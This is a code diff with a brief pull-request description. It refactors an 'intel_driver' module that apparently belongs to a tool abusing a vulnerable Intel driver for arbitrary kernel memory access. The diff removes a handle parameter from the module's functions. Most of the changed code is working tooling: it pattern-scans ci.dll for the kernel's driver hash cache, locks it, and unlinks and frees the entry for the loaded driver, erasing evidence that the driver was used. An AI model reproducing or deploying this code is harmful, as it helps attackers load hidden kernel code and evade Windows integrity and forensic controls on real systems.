@@ -1079,11 +1080,11 @@ uintptr_t intel_driver::FindPatternAtKernel(HANDLE device_handle, uintptr_t dwAd
 	return result;
 }
 
-uintptr_t intel_driver::FindSectionAtKernel(HANDLE device_handle, const char* sectionName, uintptr_t modulePtr, PULONG size) {
+uintptr_t intel_driver::FindSectionAtKernel(const char* sectionName, uintptr_t modulePtr, PULONG size) {
 	if (!modulePtr)
 		return 0;
 	BYTE headers[0x1000];
-	if (!ReadMemory(device_handle, modulePtr, headers, 0x1000)) {
+	if (!ReadMemory(modulePtr, headers, 0x1000)) {
 		Log(L"[-] Can't read module headers" << std::endl);
 		return 0;
 	}
@@ -1098,13 +1099,13 @@ uintptr_t intel_driver::FindSectionAtKernel(HANDLE device_handle, const char* se
 	return section - (uintptr_t)headers + modulePtr;
 }
 
-uintptr_t intel_driver::FindPatternInSectionAtKernel(HANDLE device_handle, const char* sectionName, uintptr_t modulePtr, BYTE* bMask, const char* szMask) {
+uintptr_t intel_driver::FindPatternInSectionAtKernel(const char* sectionName, uintptr_t modulePtr, BYTE* bMask, const char* szMask) {
 	ULONG sectionSize = 0;
-	uintptr_t section = FindSectionAtKernel(device_handle, sectionName, modulePtr, &sectionSize);
-	return FindPatternAtKernel(device_handle, section, sectionSize, bMask, szMask);
+	uintptr_t section = FindSectionAtKernel(sectionName, modulePtr, &sectionSize);
+	return FindPatternAtKernel(section, sectionSize, bMask, szMask);
 }
 
-bool intel_driver::ClearKernelHashBucketList(HANDLE device_handle) {
+bool intel_driver::ClearKernelHashBucketList() {
 	uint64_t ci = utils::GetKernelModuleAddress("ci.dll");
 	if (!ci) {
 		Log(L"[-] Can't Find ci.dll module address" << std::endl);
@@ -1130,18 +1131,18 @@ bool intel_driver::ClearKernelHashBucketList(HANDLE device_handle) {
 	PVOID g_KernelHashBucketList = (PVOID)(ci + g_KernelHashBucketListOffset);
 	PVOID g_HashCacheLock = (PVOID)(ci + g_HashCacheLockOffset);
 #else
-	auto sig = FindPatternInSectionAtKernel(device_handle, "PAGE", ci, PUCHAR("\x48\x8B\x1D\x00\x00\x00\x00\xEB\x00\xF7\x43\x40\x00\x20\x00\x00"), "xxx????x?xxxxxxx");
+	auto sig = FindPatternInSectionAtKernel("PAGE", ci, PUCHAR("\x48\x8B\x1D\x00\x00\x00\x00\xEB\x00\xF7\x43\x40\x00\x20\x00\x00"), "xxx????x?xxxxxxx");
 	if (!sig) {
 		Log(L"[-] Can't Find g_KernelHashBucketList" << std::endl);
 		return false;
 	}
-	auto sig2 = FindPatternAtKernel(device_handle, (uintptr_t)sig - 50, 50, PUCHAR("\x48\x8D\x0D"), "xxx");
+	auto sig2 = FindPatternAtKernel((uintptr_t)sig - 50, 50, PUCHAR("\x48\x8D\x0D"), "xxx");
 	if (!sig2) {
 		Log(L"[-] Can't Find g_HashCacheLock" << std::endl);
 		return false;
 	}
-	const auto g_KernelHashBucketList = ResolveRelativeAddress(device_handle, (PVOID)sig, 3, 7);
-	const auto g_HashCacheLock = ResolveRelativeAddress(device_handle, (PVOID)sig2, 3, 7);
+	const auto g_KernelHashBucketList = ResolveRelativeAddress((PVOID)sig, 3, 7);
+	const auto g_HashCacheLock = ResolveRelativeAddress((PVOID)sig2, 3, 7);
 	if (!g_KernelHashBucketList || !g_HashCacheLock)
 	{
 		Log(L"[-] Can't Find g_HashCache relative address" << std::endl);
@@ -1151,7 +1152,7 @@ bool intel_driver::ClearKernelHashBucketList(HANDLE device_handle) {
 
 	Log(L"[+] g_KernelHashBucketList Found 0x" << std::hex << g_KernelHashBucketList << std::endl);
 
-	if (!ExAcquireResourceExclusiveLite(device_handle, g_HashCacheLock, true)) {
+	if (!ExAcquireResourceExclusiveLite(g_HashCacheLock, true)) {
 		Log(L"[-] Can't lock g_HashCacheLock" << std::endl);
 		return false;
 	}
@@ -1159,16 +1160,16 @@ bool intel_driver::ClearKernelHashBucketList(HANDLE device_handle) {
 
 	nt::HashBucketEntry* prev = (nt::HashBucketEntry*)g_KernelHashBucketList;
 	nt::HashBucketEntry* entry = 0;
-	if (!ReadMemory(device_handle, (uintptr_t)prev, &entry, sizeof(entry))) {
+	if (!ReadMemory((uintptr_t)prev, &entry, sizeof(entry))) {
 		Log(L"[-] Failed to read first g_KernelHashBucketList entry!" << std::endl);
-		if (!ExReleaseResourceLite(device_handle, g_HashCacheLock)) {
+		if (!ExReleaseResourceLite(g_HashCacheLock)) {
 			Log(L"[-] Failed to release g_KernelHashBucketList lock!" << std::endl);
 		}
 		return false;
 	}
 	if (!entry) {
 		Log(L"[!] g_KernelHashBucketList looks empty!" << std::endl);
-		if (!ExReleaseResourceLite(device_handle, g_HashCacheLock)) {
+		if (!ExReleaseResourceLite(g_HashCacheLock)) {
 			Log(L"[-] Failed to release g_KernelHashBucketList lock!" << std::endl);
 		}
 		return true;
@@ -1181,9 +1182,9 @@ bool intel_driver::ClearKernelHashBucketList(HANDLE device_handle) {
 	while (entry) {
 
 		USHORT wsNameLen = 0;
-		if (!ReadMemory(device_handle, (uintptr_t)entry + offsetof(nt::HashBucketEntry, DriverName.Length), &wsNameLen, sizeof(wsNameLen)) || wsNameLen == 0) {
+		if (!ReadMemory((uintptr_t)entry + offsetof(nt::HashBucketEntry, DriverName.Length), &wsNameLen, sizeof(wsNameLen)) || wsNameLen == 0) {
 			Log(L"[-] Failed to read g_KernelHashBucketList entry text len!" << std::endl);
-			if (!ExReleaseResourceLite(device_handle, g_HashCacheLock)) {
+			if (!ExReleaseResourceLite(g_HashCacheLock)) {
 				Log(L"[-] Failed to release g_KernelHashBucketList lock!" << std::endl);
 			}
 			return false;
@@ -1191,18 +1192,18 @@ bool intel_driver::ClearKernelHashBucketList(HANDLE device_handle) {
 
 		if (expected_len == wsNameLen) {
 			wchar_t* wsNamePtr = 0;
-			if (!ReadMemory(device_handle, (uintptr_t)entry + offsetof(nt::HashBucketEntry, DriverName.Buffer), &wsNamePtr, sizeof(wsNamePtr)) || !wsNamePtr) {
+			if (!ReadMemory((uintptr_t)entry + offsetof(nt::HashBucketEntry, DriverName.Buffer), &wsNamePtr, sizeof(wsNamePtr)) || !wsNamePtr) {
 				Log(L"[-] Failed to read g_KernelHashBucketList entry text ptr!" << std::endl);
-				if (!ExReleaseResourceLite(device_handle, g_HashCacheLock)) {
+				if (!ExReleaseResourceLite(g_HashCacheLock)) {
 					Log(L"[-] Failed to release g_KernelHashBucketList lock!" << std::endl);
 				}
 				return false;
 			}
 
 			auto wsName = std::make_unique<wchar_t[]>((ULONG64)wsNameLen / 2ULL + 1ULL);
-			if (!ReadMemory(device_handle, (uintptr_t)wsNamePtr, wsName.get(), wsNameLen)) {
+			if (!ReadMemory((uintptr_t)wsNamePtr, wsName.get(), wsNameLen)) {
 				Log(L"[-] Failed to read g_KernelHashBucketList entry text!" << std::endl);
-				if (!ExReleaseResourceLite(device_handle, g_HashCacheLock)) {
+				if (!ExReleaseResourceLite(g_HashCacheLock)) {
 					Log(L"[-] Failed to release g_KernelHashBucketList lock!" << std::endl);
 				}
 				return false;
@@ -1212,33 +1213,33 @@ bool intel_driver::ClearKernelHashBucketList(HANDLE device_handle) {
 			if (find_result != std::wstring::npos) {
 				Log(L"[+] Found In g_KernelHashBucketList: " << std::wstring(&wsName[find_result]) << std::endl);
 				nt::HashBucketEntry* Next = 0;
-				if (!ReadMemory(device_handle, (uintptr_t)entry, &Next, sizeof(Next))) {
+				if (!ReadMemory((uintptr_t)entry, &Next, sizeof(Next))) {
 					Log(L"[-] Failed to read g_KernelHashBucketList next entry ptr!" << std::endl);
-					if (!ExReleaseResourceLite(device_handle, g_HashCacheLock)) {
+					if (!ExReleaseResourceLite(g_HashCacheLock)) {
 						Log(L"[-] Failed to release g_KernelHashBucketList lock!" << std::endl);
 					}
 					return false;
 				}
 
-				if (!WriteMemory(device_handle, (uintptr_t)prev, &Next, sizeof(Next))) {
+				if (!WriteMemory((uintptr_t)prev, &Next, sizeof(Next))) {
 					Log(L"[-] Failed to write g_KernelHashBucketList prev entry ptr!" << std::endl);
-					if (!ExReleaseResourceLite(device_handle, g_HashCacheLock)) {
+					if (!ExReleaseResourceLite(g_HashCacheLock)) {
 						Log(L"[-] Failed to release g_KernelHashBucketList lock!" << std::endl);
 					}
 					return false;
 				}
 
-				if (!FreePool(device_handle, (uintptr_t)entry)) {
+				if (!FreePool((uintptr_t)entry)) {
 					Log(L"[-] Failed to clear g_KernelHashBucketList entry pool!" << std::endl);
-					if (!ExReleaseResourceLite(device_handle, g_HashCacheLock)) {
+					if (!ExReleaseResourceLite(g_HashCacheLock)) {
 						Log(L"[-] Failed to release g_KernelHashBucketList lock!" << std::endl);
 					}
 					return false;
 				}
 				Log(L"[+] g_KernelHashBucketList Cleaned" << std::endl);
-				if (!ExReleaseResourceLite(device_handle, g_HashCacheLock)) {
+				if (!ExReleaseResourceLite(g_HashCacheLock)) {
 					Log(L"[-] Failed to release g_KernelHashBucketList lock!" << std::endl);
-					if (!ExReleaseResourceLite(device_handle, g_HashCacheLock)) {
+					if (!ExReleaseResourceLite(g_HashCacheLock)) {
 						Log(L"[-] Failed to release g_KernelHashBucketList lock!" << std::endl);
 					}
 					return false;
@@ -1248,16 +1249,16 @@ bool intel_driver::ClearKernelHashBucketList(HANDLE device_handle) {
 		}
 		prev = entry;
 		//read next
-		if (!ReadMemory(device_handle, (uintptr_t)entry, &entry, sizeof(entry))) {
+		if (!ReadMemory((uintptr_t)entry, &entry, sizeof(entry))) {
 			Log(L"[-] Failed to read g_KernelHashBucketList next entry!" << std::endl);
-			if (!ExReleaseResourceLite(device_handle, g_HashCacheLock)) {
+			if (!ExReleaseResourceLite(g_HashCacheLock)) {
 				Log(L"[-] Failed to release g_KernelHashBucketList lock!" << std::endl);
 			}
 			return false;
 		}
 	}
 
-	if (!ExReleaseResourceLite(device_handle, g_HashCacheLock)) {
+	if (!ExReleaseResourceLite(g_HashCacheLock)) {
 		Log(L"[-] Failed to release g_KernelHashBucketList lock!" << std::endl);
 	}
 	return false;


### PR DESCRIPTION
- Removed device_handle parameter from all API functions
- Functions now use the hDevice handle declared in intel_driver namespace
- Improved readability and simplified API usage